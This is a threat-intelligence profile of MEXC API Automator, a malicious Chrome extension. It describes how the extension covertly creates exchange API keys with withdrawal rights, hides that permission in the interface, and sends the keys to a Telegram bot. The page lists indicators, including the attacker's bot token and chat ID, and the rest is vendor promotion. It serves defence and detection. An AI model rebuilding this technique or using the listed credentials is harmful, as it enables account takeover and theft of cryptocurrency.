MEXC API Automator
MEXC API Automator is a malicious Google Chrome extension targeting users of the MEXC cryptocurrency exchange. It masquerades as a tool for automating trading or simplifying MEXC API key management, but is designed to hijack victim accounts and enable theft of funds. The extension was reported by Socket’s Threat Research Team and identified as malware.
The extension is described as a Manifest V3 Chrome extension distributed through the Chrome Web Store, published on September 1, 2025, by the developer alias "jorjortan142." Its extension ID is pppdfgkfdemgfknfnhpkibbkabhghhfh. It injects a content script named script.js into MEXC API management pages matching ://.mexc.com/user/openapi* and activates when the victim is already authenticated to MEXC.
Its core behavior is to programmatically create new MEXC API keys inside the victim’s authenticated browser session, select permissions including withdrawals, and then manipulate the MEXC user interface so the withdrawal permission appears disabled even though it remains enabled server-side. Reported UI tampering includes removing the visual checked state from the withdrawal checkbox, hiding the tick mark with injected CSS, and using a MutationObserver to keep the permission visually hidden if the site restores it.
After MEXC displays the newly generated credentials, the extension extracts the Access Key and Secret Key from the page and exfiltrates them via HTTPS POST requests to the Telegram Bot API using a hardcoded bot token and chat ID controlled by the threat actor. Reported exfiltration details include the Telegram endpoint api.telegram.org, bot token 7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I, and chat ID 6526634583.
The attack does not require theft of the user’s password and does not bypass 2FA; instead, it abuses the victim’s existing authenticated session and waits for normal user completion of any required 2FA during API key creation. With the stolen API credentials, the threat actor can gain programmatic control of the victim’s MEXC account, execute trades, and perform automated withdrawals. The risk can persist after the extension is removed because the created API keys remain valid until revoked.
High-confidence attribution in the reporting is limited. Socket reported Russian-language inline comments in the code and assessed with moderate confidence that the operator is a Russian speaker. The activity was also linked in reporting to a broader crypto-focused threat cluster associated with the "SwapSushi" brand and the handle "jorjortan142," but country-level attribution was not established. The malware specifically targets cryptocurrency exchange users, particularly MEXC users managing API keys for bots or automated trading.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A malicious Chrome extension called MEXC API Automator is abusing trust in browser add-ons to steal cryptocurrency trading access from MEXC users.
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malicious Chrome extension published on the Chrome Web Store that abuses an authenticated MEXC session to programmatically create new API keys, enable withdrawal permissions while hiding them in the UI, and exfiltrate the API key/secret to a hardcoded Telegram bot so the actor can drain funds.
A malicious Google Chrome extension that targets MEXC users by injecting a content script into the authenticated MEXC API management page, creating new API keys with withdrawal permissions, hiding the withdrawal permission in the UI, and exfiltrating the Access Key/Secret Key to an attacker-controlled Telegram bot. The stolen keys can enable account takeover actions such as trading and withdrawals even after the extension is uninstalled (until keys are revoked).
A Manifest V3 Chrome extension that activates on MEXC’s API management page, silently enables high-privilege API key permissions (including withdrawals) via UI deception, scrapes newly created Access/Secret keys from the DOM, and exfiltrates them to attacker-controlled Telegram infrastructure to enable account takeover and fund theft without stealing passwords.
A malicious Manifest V3 Chrome extension that runs on MEXC’s /user/openapi page to automate creation of new MEXC API keys with trading + withdrawal permissions, deceptively hides the withdrawal permission state in the UI, then steals (access key + secret key) from the success modal and exfiltrates them via HTTPS to a hardcoded Telegram Bot API endpoint, enabling account takeover and financial theft via API-based trading/withdrawals.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.